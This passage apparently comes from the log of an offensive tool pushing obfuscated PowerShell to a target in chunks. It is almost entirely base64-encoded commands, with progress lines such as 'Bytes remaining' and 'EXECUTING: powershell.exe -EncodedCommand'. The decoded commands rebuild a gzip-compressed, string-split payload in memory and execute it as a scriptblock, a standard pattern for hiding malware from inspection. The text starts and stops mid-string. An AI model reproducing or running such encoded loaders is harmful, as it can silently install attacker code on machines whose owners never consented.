AbgBQAGoAZgBrAGQALwBSADMAMQA3AFAAZgA0AEkAUwA0ADgASAA4AHQANwAzAEoAbABZAEgAdQB3AGIAKwAvAFEALwB5AFYAZgBoAFkAbQBZAGMAZwAnACsAJwAwAGQAcgAzADUAegArACcAKwAnAFIAegBoACsAcQBnADgAbAA4AHMAdAAvAHUAdQAvAE4AKwBlAGYANABxAGQASAAzAFAAZgAnACsAJwBkAFAAUQArAHcAZgAxAC8AUwBSADQAbAB2AFQATQB2AEwARwBOAGYAVgAwAGEARAA1AGoAZgAwAHoAaAAwAFMAbgA0AFMAMwB4ADAAeABHAHUAewAyAH0ASABMAFYANQArAHkASAB5AE0AdABXAFIAdgBmADMANQBHAFAATQB3ADEAJwArACcAcgBzAFgAKwBFAGcAQgBEAHMAUQA2AGUATQBQADcAcQB7ADEAfQB0AHoAcgBUAHYAUAB0ADIAcgBxAGUAWQAnACsAJwB4ACcAKwAnAEgANgBzAHQANQBiAGwAYgAxADgAVgBLAGgALwB3AE0ANAB1AEsAWQB1AGoAVAB6AG4AUwBqADIASABKAEYAKwBFAGkAMQBQAHkAKwA4AGIAeAAyAGMAOQBmAHcATABPAEcAUABCADIAUgBaAHoAJwArACcAUAA2AEgAdAAwAHoATQB6ADkAdgBZAC8AMABhAFUAVgArAHsAMgB9AGMAWABCAGUAeAByAHgAWgA0AGIAYwBNAHYAdAB6AGoATwBmAG0AcgArAEYAagAwADgAYgA3AHsAMQB9AEkAbQAvAFkAVQBlAGUAbAA1ADkAegA5AFMAOABPADUAegBwAE0AZABkAFMAcwAxAC8AagBqACsASABFAGUAWgA2ADQAbAB4AGEATwB1ADUASQA3AGcAVgA4ADEAegAyAHYAZQAzADUAcwBlAGUAZQBHACsATgAyAHgAZgBxADEAZgAzAHUAdQBGAHUATABjAE4AZgBMAFgAcABlAHQAZQBLAFgAbgBrAG4AMgBVAFoANQAwADQAbABlAFQAegAwAFAATwBqAFcALwBZAGYAbgBkAFkANwBIAFYAMwBqAFIAbQAnACsAJwB2AGsASgBkAGkAagBqAHYASwB0AHEASQAzACsAYgBVADAAZAAnACsAJwB6ADkAewAxAH0AcwAvADMASABnAE8AYwBhAHsAMQB9ADMANQBuADAAcgA1AGgASQBaAGMAVQBRADgASAB2AEcAagArADgASQB7ADIAfQB2AHsAMQB9AGQAYwA1AHIAbAA5AEgANgBqADgAMgBZAGQAWQBaADkAUgBuAGwAegB5AFgAcgBqAC8ATQBFAHkASwAvADIANQBoAG4ARgBNAGcANQBNADYALwB5AEgATwBTAHEAeAAvAGMASwB2ADEAYgBZADgAOAA1ADkAVwBRAFgAZQAvADYAUgBPADEATgBRAFAAMQBjAGMASwB1ADgASgBiACsAbgBuADQARQBoAHkAZwB6ADQATQBQAHgAagBwAHcAWQBmADQARgBYADgAVABPAHoAQQBsAE8AZAB7ACcAKwAnADEAfQBsAHoARwAvAHQAMQB5AHgAdwB0AGMANQAvAHYAZQBjAHkAewAyAH0AZgBrADMAKwBXAGgARABuAHsAMQB9ADkALwBtAHgAZABUADkANABhACsAKwBzAEgATABmAFoAUAAnACsAJwA0ADYASgB7ADIAfQA0ADgAeAAyAE0ALwBmAEkAQgArAGcAZgBpAFEAWABLAFgAbgByAFEAVgA0AGQAcAByAEgAdgA3AGgALwA4AHQAeQA0AGkANwB3AHQAeQAyAEkAZgBEAEIANgBTADUAOQBKADcAQQB2ADYATQBxAEcAUAA4ADMAMwBNAHoAMQAyAFgAUABMAGIAUgArAEEAOQA2AE8ASABHADgAdgArAEcAMwBTAHgAWAB4AHIAKwB1ADgAYQBVADgAZQBwACsAMQAzAFAAZgBSAHIAUAAxAHcANwBnADMAUAB2AFkAOQA4AHQAdQB6AEQAbgBQAGMAdwBmAGwAbgAnACsAJwBlAEoAagB7ADIAfQAnACsAJwBVADQAeQBmAHoAWgBmAHYAaQBMAGUAcgAvAEIAVABBADQANwByAC8AegB2ADQASgAvAE0ATwAvAEsAWQA0ADMAcAAvAHoARABQADMATgB0ADMANQBpAGgAegBYAG4ANQBKADUAagBkAE4AUwBqAHAAZQBmAGEAeAA3AE4AZABsAFAAKwB1AFAAKwBjACsAMgBQAHkAbABKAEIAOQBIADQARQB1AGMAUQA1AGkAZgBYAGgAcQBmAHoAQQBkAGEAOQBQADcARQBzADMAUwBjAGYASQB5ADQAbgBEAEkAdgBsAGIANgBaADUAOQBkAFgAeQBPAGYANQByAHYAYgB2AG0AVABQAEkAYgB0AE0AUQArAGMAMAB0AGMANwB2AGMALwBZAEQAegBaAFIAbABpAG4ANgB6ADQAdgBZAHQAegBEAGUAcABJAFEAOQAwAGEAWQBMAGQAWQBSADgAMQB2ADUAKwBaAG4AbgBxADkANQBiAGwAYwBUAE4AdwB2AFAAegBRAC8AMABGAFkATQA0AEYAOABPAHYAMQBHAFAAMgBlAGEANQB4AGoAegAyADMANQBzAGYAdQBOADQAZgBuAFAASgBGADkAWgBaACsASgA1ADUAOQB0AGoASwBlAGEAZgBNAHoAOQBuAGUAZQBHAC8AZQBhAEwAawBxAHMAawB6ADgAQgBQAHgAMwBIAEEAMwA1ADUASAAzAC8AbgAvAFYAKwBEAHsAMQB9AEYAMwA1AFgANQBBADEAegBJADcANAB2AGsAWgBmAHUAbAAyAHIAOAArAE4AegBIAFIANAAwAC8AYQAzAEEAOQA5AGcAdQBlAHkANgB4ADYAWABOAG0AUwBYAC8AQQAwADEAeAAzADMAcgAvAC8AbgArADAAUgB3AHYANwBMAHcAZgBLADgAaABMACsAeQBYAHQAZQBjADYAQgBmAEwAawByAEsAKwB4AEoAMwBOADcANwBoAHMAeQB6ADQAOAA4AGMAVwBXACcAKwAnAGUAKwBCAGoAcgBTACsAdwA3AHYALwBSAHkAZAB2ADMAMwBHAGYATgAnACsAJwBaADkAOQBPAHkAeAB4AHcALwBqAGMAeQBMAFAAdgBWAHgALwBnAG4AZQBNAHoAWABQAGUAcQBSAGUAZAB1AFMARABlAE4AZQB6ACsAMABUAG0AUgBIAG4AZgB4ADAAdgB2AGoAWABtAFIAKwAwAGQALwB4ADUAaAAwAGMAUgA2AHoATQBTADYANQBmAHoAYQBlAEwAVQBQAHMAQgB5AGYAawBYADMAYgBzADUAMgAwAHQAOQAvAHAANwAxAHQASgAxAGoAVAByAEYAZQB1AGIAaQA5AE0AawBaAC8AWQBMADUAMwBiAHkATQA4ADUAMABkADgAdwBUADUAdgB3AEQAUABVADkALwBuAFAAbQB4AE4AUABNAFIAKwA1AHMAVABMAHoAZgBkADMANABJAEYAdwBiADAASgBjAGcAcQAvACsASAB0AE8AQQBkADcATwArAGoANwA4ADMARAA3AEsALwBtAHoAUAArAFQARAAyAFgAcQA5AEYAcgA2AEwAcABNAGYAWgBFAGQAcgBXAC8AcQA3ADUAaQBlADEAegBhAGUATQAnACsAJwAzAHIAZQBlADAAWAA4ADcAOAB6AEgAeQBZAE4AZwBQAHIAQgBCAHIAdQBHAHYAZgBuAEkAWgA0AHYAZQBmAFgAUgBuADEAMgBNAEwASABaAGIAYwBGAGQAVAB0ACsAWgAvAGoAYQB6ADUAcwB1ADMAUwBjAFEAbAA3AG0ALwBTADkAegBiAHoAcAA2AFAAMQBKAEUAdgBLACsANwAzAHoARgA5AEcAMQBNAEYAdwAyAGUAUABnAEIALwBKAG0AMwB1AFAAdQBsAFAAewAxAH0AcAB1AHgAcwBmAFIALwBSAG4AYwBZADYALwBOAHQANgBQADQAMwBjAFQANQB3AFgAcgA3AEcALwB6AHkAUwBuADcAdABWADQANAA0AHQAOQAxAGQALwA2AHUAOQBNAG4AegBXAC8AQQBsADgAbgBMAGIAcAB5ADcANwB2AGcAMgBjADAAUAA4AG4AJwArACcANwByAGUATgBKAHcALwAyAHMALwBuAEgATAA3AHoAZgBsAFoARQBmAEwAWQAxADcAVwBlAFEASAA4AE4AUQB5AGUASgA1AFEAZABIAEcATwBXAEQASQAvAFUAVAA2ADUAMwBwAHoAcgBIADMAMwBTAGIAOQAvAHoAZABIAC8AQgAvAEEAQgBjAFoAYQA2AFEAVwBiADkAUgAxAEkATwA1AHsAMgB9AFAAMQBpADUAUAA4AEYAZgBVAFYAbQB2AFYAMgAzAEsAbgA4AEgAcgArAE4AOABOAFAAZQA4ADMASABPADEAbQBuAHAARQBuADQAYwA4ADIATgBOAHgAMgBZAFYAMwAvAC8AaQBQAGQAOQBYAGoALwB1AEgAZABmAC8AMAB2AGwASQArAGgAewAyAH0ANABFAGYAQQBBAEEAewAwAH0AJwApAC0AZgAnAD0AJwAsACcAbwAnACwAJwBDACcAKQApACkAKQAsAFsAUwB5AHMAdABlAG0ALgBJAE8ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ATQBvAGQAZQBdADoAOgBEAGUAYwBvAG0AcAByAGUAcwBzACkAKQApAC4AUgBlAGEAZABUAG8ARQBuAGQAKAApACkAKQA= -InputFormat None +[+] - Bytes remaining: 6384 +[+] EXECUTING: +powershell.exe -EncodedCommand JgAoAFsAcwBjAHIAaQBwAHQAYgBsAG8AYwBrAF0AOgA6AGMAcgBlAGEAdABlACgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBJAE8ALgBTAHQAcgBlAGEAbQBSAGUAYQBkAGUAcgAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEcAegBpAHAAUwB0AHIAZQBhAG0AKAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgALABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAKAAoACcASAA0AHMASQBBAEwAcQBtAEgAMgBrAEMAQQA0AFcAWQBTADMAUABiAFMAQgBLAEUALwA4AHIAZQB2AEIAcwB4AEIAMABxAGkAUABOAHEASgBtAEUATgBCAEEAQgArAFcAUwBCAHsAMgAnACsAJwB9AGsASQBaAHIAYwAyAEEATgBmAHAAbQAxAGEAcABpADMASwBnAHUAUgBmAHYALwBsAGwAZwA2AE8ANQByAFMANABNAHsAMQB9AE8AagB1AGUAbQBSAGwAWgBmAFYALwBpAG0AOQBQAG4AeAA4AE8AMwArADYAMwAzAHgANwAvACsAOABjAGYAawArADMAagAzADEANwBjAEwAUgA4ACsATAAxAGQAZgB0AC8AOQA4ADAAOQBMAGYAZQBmAFgAeAA2AFgARgA1AEsATABwAHYAZgBuAHQAegBVADAAYwByAGkAbgBhAHMAeQB1AHcAbQA4AG4AMwBjADEAdABrADgAaQBuAFgAYwAxACcAKwAnAEYAawBXAHYAVABuAHYAagA5AEcAWgB4ADcAQwBNAGgAOABqAEwAbQBFAGEAOABSAE8AYwB7ADEAfQBXADMANgBMAFYAawB6AHEAYgBCAEQAWABWADcASABlAFoAYwBQAHsAMgB9AFIAQQB3AGoAVwAwAFoAbgBGACsAcwB5AGUANABqAHUASQBFAFoAbAA5AGoAVwBLAEkAawByAFcAZAAvAHcAOABpADIASwBuAC8AYgBJAHEAOABsADIAJwArACcAOABxAC8AWAArAGUAcwAyADYAZgBuAHsAMQB9AFAAMgBqACsANwBaAEYAKwBkAE8AMgBIADkAcQBzADQASwA3AEYAcQBYAFUAVQBlAG4AaQBGAEYAawBQADkAbAAvAFUAVwBkADcAegB0AE0ANQBlAFgAVABuAFUAZABWADYAMwArADMASABzAE4AWQArAFIAUgAzAHoAVQB1AHQANgAvAFYAagBzAGQATAA3ADIAMgBlADcAMAB2AGYANgAvADIAVwBWADEAWABCADkAagBFADkAawA0AHUAdgAnACsAJwB1AFkANwArAEoAWABzADgALwBYADYASgBWAFIAbABWAHEAdgBkAFkATQA2ACsAeABWAEYARwBZAHMAeQBhAC8ATgBjAFIAJwArACcAZgBhAFcANwAvAFMAKwBKAEEANABUAGYAbQBYAHYAcABzAHgAKwBqADcAdwBmAEgAOAB1ADQASgBBADcAeQBzADQAMgA5AEUALwB5AFMASABTAFAAaQB7ADIAfQBEAGoATwA4AEMAZQB2AFkAcgBWAFQAZgBMACcAKwAnAHAAbAByAEUATgB4ADAASABtAHoAeQBMAHEATwBUADYAMQAxAHMAawB0AHgAZgBZAHIAdQBWAFMAdwBqAHUAMgBlAC8AdQB4AHIANwBmAGQANwBuAEsAUAB7ADIAfQB4AHIAYgBNAEQAOABaAE0AOQBiAGYAYgBkADEAcwBwAEQAcgA0AFUAZgBEADkAaQByADUAMgBlAGUARgA5AGkAbgA5AGQAVwBPAE8ATgAnACsAJwBiADQAWgAvAHUARwBQAHIAZABTAHYAbABpAG4AKwBJAFQAcwA3AHUAdwBWAEoAKwBMAEwAcwArAHcAagBQAHoAdgBsAHAALwAnACsAJwB1ADMALwBPAHkAeQBUADUASABQAFkAMQBCAG0AMwA2AEwAYgA1AG4AZABJADMASwBkAGwAZABoAEgAZABJAGkAYQBCADMAMABIACsAbgBsAG0AdgBlAEIAKwBJADEANABnADQAeQB5AC8AbAA0AGQAcgBuADgASAAzAHYAMABQAGkANQBKAGwAOAAxACsARABJAHUAOQBMADMAaQArAFIAbgAvAFYAOAA3AEgAVwBuADcASwB2AG0ATABPACsAdQAvAGsAUwAvAGEAZQBSAGIANQBtAC8ANwBmACcAKwAnAFIASwA3AHsAMQB9AFAAZQBUAGkAeQB6ADQAJwArACcAUgA0ADYAdgBrADgAZQBnAFAAaQBkAEkANQBkAHMAdgB1AE0AYwAyAFkANwBmAFMAZABjAEMAZAA4AFgANABIAGMAewAnACsAJwAxAH0AdwBxADMAdwBkADQAcgBYADEAUABhACcAKwAnAFUAMgBQAHQARQBYAEkAYQBjAHEALwAxADAANwBuADMAMABqAGoASABZAFoAZgA5AE8AKwBaAEYALwBIAGYASwBXADgAcgB2AGMAawBiACsAUwB1AE4AYQBSAEcAMgBjAGwAZAAnACsAJwBpAG4AdQBCAFgAVQAxAEwAcgBWAHYAWABxAFgANgBLAE4AaABmAHoAOABMAHgASABmAGgAVgBYACcAKwAnAHMAWgA4AHIANwBoAHQAeQBaAC8AaQBJADMAeQAyAHcAYgBkAHcAOQBrAGgAOAA3AC8AaABlAGMAVgBoAFMASAA3ADAAZAA5AGsAKwBKAHgANwBMAFUAZQBjAHIALwB1AHsAMgB9ADUAJwArACcAegA4AEQAZwBPADQAVABqAFYAVAA4ADIANQBrADgAaABHAFUAewAxAH0AeQB3ADkANAB4ADgAQwArACsAZgBlAEYANwB0ADUARgBlADMAUgBWAHoANgA5AHEAdQBVAFgANwBKAEwAUABIAEIAQgAvAGoAZQBsADQAbABFAGMAOABMAGYARQBuADUAWAByAHIAQQBBAGYAdgAxAHgAZgBPAC8ARwBFADgAagBlAHMAcQBaAHUAQwB2AEYAMQBnAGgALwBKADIAYQB6ACsAeAA5AHgAcgArAGkARwAvAFUAdQAzAEQANgBQAFQAcgBrAEMANQB3AFYAKwBEAFgAaAAvAFkAWQA2AFUAZgAnACsAJwB6AGsAegB5AFYANQBVAGoANAB5ADYAbQBaAE0AWAB7ADIAfQBYAFQAcwBYAGwAcABEAGsANwAxAC8AMAByAHYAWgBWADkAUgBrAFkAOAA5ACsAOABuAC8ARAArAEQAaABsAGoAZwBSAFQALwB3ACsAKwBhAFAANAAzAFoARgBYAHgAVwBWAEQALwB7ADIAfQBUAFgAcwBpAFkATwBKAFgAaAAxAC8AcgBUACsASABwAHkAWQBsAHgAUwBQAEYAZgA0AHEALwBzAHIAagBuAHYATQBVAHgAMQArADgASAB4AHMAUAB3AGYAKwBuACsASwBuAC8ANQA5AGkAMwBNAEgAJwArACcAOABjAE8ASAA4AFMAeABSAFcALwBQADgARABUADAAcgB4AFcARQBxAGQANwAxAHsAMgB9ADMAQQBrAGYAaABCAGUAWgBpAEQAMAB4AG4AdgA1AGIALwBpAGQANABtAGQAcwBxAHUARAAzAHgAdgB3AEoATgB5AEwAeAA1ADYASQB2ADcANAAvADgAbgA1AEoALwB7ADEAfQB1AFAAcQBpACcAKwAnAC8AbAA5AFIAZwBUADgASgB4AFQARgA2AHIARABQAEIASwBlADgAZwBMADcAYwB2AEkAMwBLAHMAUAA0AHYAKwBOAGMANABYADUARABYAFMAZgA3ACsAdABpAHYAKwBQAC8ATwA5AHgAOQBMAHgAVQAzAHgAWAAnACsAJwA1AGcAUABtADMAdwBKAC8ANABwAGoAagAzAFgAdQBDADgASwBmADgAbgBJAHcAWAA1AEoAdgB4AFYAdgAyAHQAOABEAGoAaQBSAGMARwAxAEoALwBxADkANABhADYARQBsADYARQB1AHcAZgBXAG4AWABqAHAAOQBKACcAKwAnADMAcQB1AGUAUwA5ADYAdQBhAEMAYwA3AFQALwBFADcAeQA4AGMAYgB6AFgANQBHADIAUABYADgATABUAFcALwBDADYAYgBQAGgAcwBSAEwAMgBkADgAaQByADgAagArAEEASAA0AFcAQwArAHkANwA2AHcAegB4AGoALwA5AGQAMgBFADcAeABTAFAAVwAvAE8ASgArADgAUwBIAGgATgArAEUANgA1AGwAeABwAEgAMwBnAFcAZgBKAFkASwAxADcASwAwADYAQwBVADMALwBMAHYAWABTADIAYwA5AHYAYgBVADgAMwBtAHkAUwAzAEUAVABYAHQAYgBtADMAegBuADkANQBCAHoAKwAwADcAbQAvAHcATgArAEcAdQBBAGoAdgBOACsAUgBSAHYAQwBLAGMAZgBlAFoANQBiAHIAOABPACsAcAA3AHoAMgBzAEsAQgA0AGsAZwAvAEMATwBGAFIAKwBGAHEAVwBxAGEANQBVAC8AKwA0AG4AYQAvAHEAYgB6AGwAZAA5AC8AMgBEAC8ATgBmAFcAaQBYADYAMAB6AFQAeQBSAGUAMwBZAE8AbgBnAC8AcwBhAFAASAB4AHQAdgBuAHYAYgA0AEsALwBOAHYAcQBjADQAeQA0ADQATAA2AHQAOAA4AEwASgB4AE8ANABQAG4AYwA5AGQATABrAFgAZgB5AHAATwBFADcAaABKACsAewAyAH0AWQBuAHEAVgBQAGMASQA3ADYALwBwAHsAMQB9ACsAZQBzAEsARAB6AGoAUABmAHkAZAA0ADUAZgBUAEgAeABVAHAAdgA2AFUAYgA0AHIANwBOAC8AQwB4ADcASgB6AEIAdAA1AGsAVgAxAG0AbQB1AE0ANgBKAGgALwBLADYAQQBJADgAZAA1ACcAKwAnAC8ALwBlAGYAUgBwACsAewAxAH0AMABmAEEAaQA2AGsAZgAvADAAagB4AFQALwBaAFgAOQBKAFcALwA4AEQAaQBuAGIAJwArACcANwAwADMALwBsAGkAZgB1AC8AOQBlAE4AUAAxADYAeQB2ADkAWAA2AEEASABIAEkAKwBGAGcANgAzADcAWABWAHgANwB7ADEAfQBHAFMAVgAxACsAaABYADcAMQBzAFMAegA4AEgANABkADgARABVAG0AUAArAEEAdABzAGgAZgB3AFAATwBiAC8AcQBwAHMAeAArAEMAegBNAHQAMgAzAHkAcQB1ADkALwAwAEEAZQBIADQAQQBMACsATAA2AG0ATABQAFgASAA2AHsAMQB9AHIAMAB1ADYATgBPAHEAeQB4AG4AMQBxAEQAcQB7ADIAfQB5AEQAUAAxAEQAbAAvAFMAQgA2AEsAeAAyACsALwBYADUATQBOADUAVgBmAHcAdgB3AGIASAA3AGoAUABJAGkAZgA4AC8AQQA2AFIASwBjADgAbgA2AG4AZgBIAFQAZABGADYALwA1ADEAVABrADMANwBLAGQAOABMADgAaQBEAGYAcgBzAE4ASAA1ADUAegByAHYAVABGAHsAMgB9AGQARgBoAEcAZgBHAFoAMABoAGQATwBjAFIAVABlAEYAWQA5AGIAOQBsAGMAKwBPACsAUgBUAGMAUgA2AEIAegB4AFYAOABSAHAAMwB3ADcAUABYAFkAVwBhAEcAMwBYAEEAZAAzAHgAbgBXAGgAZQBDAG4AZQArAHMANwB2AGgAWgA4AE4ALwBnAHQAbgBOAC8AQwBlAGMARABJAHcAegA1AGIAdwB3AFQAUAA1AG4AdABKAGYARgBLADgAeAB2AEoAZQA3AEQAegB3AFQAWAA5AFgAWAB6ADYAewAxAH0AYgA0AFoATQAxAHYASABWADAAWAAwAEcAdgB7ADIAfQBhADkAMgBTAGMAOQBwAC8AKwBjAEcAYgB4ADMAcwBtAHMATwBMAEsAZAA3AFcAcQBSAFgAMQAyAEQAcwAwAGQAVwBrADkAYwAwAEYAKwBiADYAbgAzAGgATgB1AEQAKwBTADcAUwBlAHYAMAB1AEcAdAAzAHkASABYADAAeQBjAEgAMQBlAHcAWABmAGYALwA0AHAAVABUAGwANgBTAGoAagB2AHgAJwArACcAVgA0AFYAKwBsAEIAOAByAGYAbgB1AE8AMgB4AEUAKwBIAGgAawBuAGgAeQBpAEoAdgAvAFQAYgAyAEwAcQBVAGUAewAyACcAKwAnAH0AYgBIAFMAKwBwAGcAYQBMADIARgBmAHgAMQA0AEsALwBHADkAKwA0ADkAdwBNAEMAdwBUAEgAewAyAH0AZgAnACsAJwAwAFQALwB7ADEAfQBQAC8AUwBUAGYASgB6ACcAKwAnADIAbQBlAE0AMwB7ADEAfQBYACsAWgBkADkAbgBYADkAWAB1AEsAdgA4AFMARgAvAE4ANgA0AHoAOQA3ADAASgAzADAAMwB7ADIAfQAvADkAYQBmACcAKwAnADQAagAzADUAcgBmAGoAZgB1AGsAKwBoADQANwB2AG0ALwBhAFgAMQBsACcAKwAnAEgAVwB7ADEAfQBjAFQAVgBsAGYAVwBYAGMARgArAEMAMQBUAFYAeQBtADkARQAzAHgAUwB7ADIAfQBVAHUAVABmAFAAQQBEAGIAeQB7ADIAfQBkAFkATQBtAEQAdABkACsAcABxADcATQBDAC8AagBSAHAAegA5AGMANABOACsARQB1AFMARAB4ADUAYQAzADEASQBYAHAAZQAzADYAbQBlAFQAagBxADUAUgBaADgAYwBVAGgAKwBxAE0ALwBVAC8AOQAwAFAAeABTACcAKwAnAEkAdQA4AEsAVgA2AFAAMgBEADEAcgA2AG0ASwBEAHYAaQBMAC8ANQBGAGYAKwByADYAeABuADAASgAyAEsAcwAvAHgAWgB3AE4AUABDAGsAZgBqAG0AQgBSADAAeAB7ADEAfQAwAGMAUwBwACsAYgAvAEsALwBKAEQAMwB3AEEASAB5AHAAZgA4AGQAaAArAGUAZwB0AGYAYwAvAFAAUwBBAGYAYwBMAHgASgArAHgAeQBmAEIAUgBmADQAZgBDAFoAZQBuAEUAZAA1AGQANgBuAGgAUgAwAGIAKwBMADkATABmAFMAcAArAHkAdAB1AEoAdAArADcASQBrACsASwAzAHsAMgB9AEoAKwBKAGQAOQBiAHUAWAAxAGQASgBWAC8AVQA0AEYAegB1AHQAeQAzACcAKwAnADUAYQA1ADAAUgBUAGIAOQBSAHgAMAByAE4AbgB4AEgAMgBCAHYALwBKAHYAaQBWADcATQB6AFcALwAzADUARwBlAEkANwBoAFAAdQAxAHYAQgBFAGQANQA3ADAAOQBEAFYANgB7ADEAfQB2AHYAbQBuAHQAZgBjAEQALwA3AHEAQQA3AFgAdwBSAEQAMgBoAFkAMAA3ADYAdABZAEQAdgAwAHsAMQB9AFAAewAyAH0ASAAvAHIAQwBQAHYARgB4ADYAdABmAFcAdwAnACsAJwBjAEsAUAA5AHgAZgBlAFAAdQBHAG4AOAAnACsAJwBPACcAKwAnAEgANABUAGQASABWADYATgBUAFQAZgBCAEcASgBGADYAYgBXAG4AVgBmAHMAZQA4AGwANQBOAC8AVQBwAHoAMgBrACsARwBIAHQATwBHAHAAQwBmAE0AZgA2AE0AeQB0AFQAbgB4AGsAMABkAFMAMAA5AFYANQBIADIARgBuAGwAVgBmAGMAZAB4ADcAbgBxAHQAYQAnACsAJwAxACcAKwAnAGsAbQB1AGkAeAAxAHoAdwA5ADcANgBDAG4AMwBZAE0AUgA5ACsAUwBQAHEAWQBlAGEAcABPAGYAVQBuAHgAVwBhAEUAagBoAFUAOAA5AGYAOABDACsAdABYAFYAZABTAFQAeAB5ADQAagBPAGcAYgByAFgAUABqAEwANQBsAFAAZwBjAGYAewAxAH0AYgA5AHYAcAAvACsAbgB2AGkAagBjAHYAMQBqAC8AMQAyAEcAZAB2AGUAVQBjACsAYQArADQAZgBFAG0ANgBrAHIAdwAyAGMAYwAzAGQAZAA1ADcAcABFAHoATgB3AEQATwA5AFkAOQAxAHMAMwAzAHMAUABUAFUAMwBpAG0ANQA3AHkAOQB0AC8AMwB3AGQAZQA3AG4AaQA5AGQAKwAxACsAZAA4AHoAOABVAFQAZABKAGoAaQBNADgAVgArADIAVABtAG4AZgBsAE4ALwBlAFkARgB2AFYAdABSAHIANwBqAG0ANwB3AGwANwAzADAAeAA3ADgAcAB6AHAATgA4AFgATwBmAEgASgB1AFAAegBLADkASAA3AFAAUwBjAHAANwByAHoASABOAEYANwA3AGIAdgBKAGoAegBtADYAeABuAHsAMgB9ADgAMQBmAGMANgA2AFIARABsAFoAdwBOAHYAYQBqAC8AWABuAC8AcABmAE8AaAA5ADcAZABCADUANABJAFYANwBVAEQAZgB2AGwANQBzAE4AegBlAEUAWgA0AEcAUABrADkATwBCAGEAZQBKAHUARAB0ADIAcgB4ADcANQBIAGQAcAArADYAeABiAEgAewAyAH0AMQAzADUAZwB2ADUAZQArAE4ANQB6AHYAUABqAFoAYQBNAHoATABqACcAKwAnADIAWABVAEYAKwA1ACsAMQB1AGIAUAByAHEAcABVAHgAeAAnACsAJwBYAHgAcQBGADUAZABNAGEANgBSAFoAMQA0AGQATgBQAGcAYQBVAEIAZQA0AE4AWABHADMAagB2AFAAUgB5ADEANAB0AG0AdgA5AGcARwA1AEEAYgAzAEkAUABrAHYAagB4AHMAKwBOAHMASABqAEcATwBYAHUARABoAHQAZQB0AGcAbgArAFkAdAA4AFkAdgAxAHAAUABBADMAdABhADcAaQAvAGkARQBlAEUAdAAvAFMAUAB4AHIAZABtAHYAUgBiAG4AegBwAHgAbgB4AFkAUABMAE8AawBuADEAdgBsAGgAZgBUAFgAQQBIAHUAVwB6ADkAUAB5AEkAagBsAGYAZAA1AHUANABiAHYALwBCAG4ANgAvAG0AMwBEAGEANwA3AHoAVAB6AGoAdQBsAEoAKwB6AHsAMgB9AGoAUAB6AFAAVgB7ADEAfQA0AGYAOQBiAGMAQwBpADgARABaAHYAbgAxAC8AawAxAGYANgAzAHoASQBmAGMAYgB2AFUATwA2AFIAeQBCAC8ASQBWAHoAMgByAE4AcwBtAGEAVQA0AGgAdgBrAEcAYwBUAHYAUABDAFQAKwB0AEUANQBzAEUAZQA5AHcAVwBzADYAeABPAFgAQwBuAHMAOQBCADYAbgB1AFoANQA2AGIAQwB1AHIAVwAvAEQAUwBsADcAOABxAFAARgBUAHIAVQA4AHcAbgA2AGQATQBkADkAUgByAHYASgA0ADEAUABLAGUANwB6AE8ASQBlAHEAegBDACcAKwAnACsANQBKAHcAQgA5ADUAaABNAGMAZAAxAHgAMQA5AHAAYgBiAHUAMgA2AEcARABYAHUAOAA3AFMAcwAvAFAAOAB6AFMAWAA2AGoAegByAHEAZQA0ACsANgBUAGYAeQBUAG4AMAB3ADMANQBYACcAKwAnAEsAZgAyAGYAZgA2AEEAVABmADgAMwB5AEQAMwA5AGIARQBJAFUAYwBIAGcAdQA4ADIAZABUAGYAagBlAGQANwBjAEkAdwB6AHsAMQB9AHkAMQAzAHUARgA1AGgANwAzAGMAZQAvAE4ATgA4AFYAUABNAC8ASQBiACsAcgBMAEQANgA3AEgAUwBIAFAAQQBpAEgAcgB1AHsAMgB9AFkAdgArAE4AaABlAG4AdgBuAFoAZwAzAHcAMgA2AFUAZgBGAGIAZwB1AHMATwA5AHEAewAxAH0ANQBlADQAQwBmADcAaQBQAHEAVgA1ADEAQgBjADQALwBGAC8ARQBTAGYAZwB5AGUAcABXACsAcQBIAHUAbQBaACsAQQBpAGQANwA5AGoALwBuAC8AWgBTACsANwBiAG0AZABlAFcAVwBmADUAaQAzAGwAMAAvAHEAVAArAEQAVwA2AGEAbABPAGYANQBwACsAdwAzAGwAWABkAHYAZgBmADgAewAxAH0AeAB5AFMAYgBqAEcAZgAzAGQAVgBwAFgAVQBWAGMAYwA5AC8AdgBmAE0ARwB2AHsAMgB9AGYAVQB6ADkAeABEAEUAcgA5AC8AewAyAH0AewAyAH0AYQB2AFUAWAAzAHUAZQBFAC8AewAyAH0ATgBmADMAewAyAH0AKwBHAG4AcAB1ADYASgBPAC8AaAA2AFIAVAB1AGYAZQBCAHIANQBnAEwAZgBUADkANABwAE8ANgBFAHkAMABmAHMAVwBuAHQAdQBhAEsAVQA1AGwAZgBXACsAeAB6AHIAZABMADEAagBYADMARgBOAEgAUwArADQARgA4AHQAZAArAGIASAAzAGwALwBnADUAZgBjAHkALwBCAEgASABEAGcAdAAyAHoAbQArAFAAZgBOAGYASABXAEoAUABYAGYAdwBjAGgAZgArAGsAcwA0AFUAWABoAGIARQB3AGYAYwA4ADMARwA4AE0ATwBQAGUAUgBPAHYAZQA5AEIAYgBpAHoAVABuAGIAZABQAFMAWgA5AGsATwBiAHMAQgBYAEUAcABqAFAAKwBKADUANgB0AFgAMwBmAE8ARQB2AGIAZgBVAG4AWABrAHoAMwBmAGQAVgBrAGYASgBtAFAAawAzADYAcQBZADAALwBVAC8AUgByAHQAMABwAHgANgBZAEUAdgAnACsAJwAvAEMAbQBKAFgANwB2AFIAWQBTAC8AcwB2ADIAQQArAHoAZQBsAGYAdwBuAG4AUAB2AEgANwBxAHYALwB0AEcAegAvAHgAcwA5AE0ARgA5AHsAMgB9ADkAZABiADQAQwA3AHAAdQBpAEwAZABlADMAaABPAFQAWABwADYAcwBVAHYAMwBlAEMAZgA5AGEANwAwAEUAbgBpAEwAMQB2AFMAMQA5AG4ASAB3AHkAbAB5AGwALwBwADMAaQBQAHUAYgArAGcAcgA5AGUASgBOAD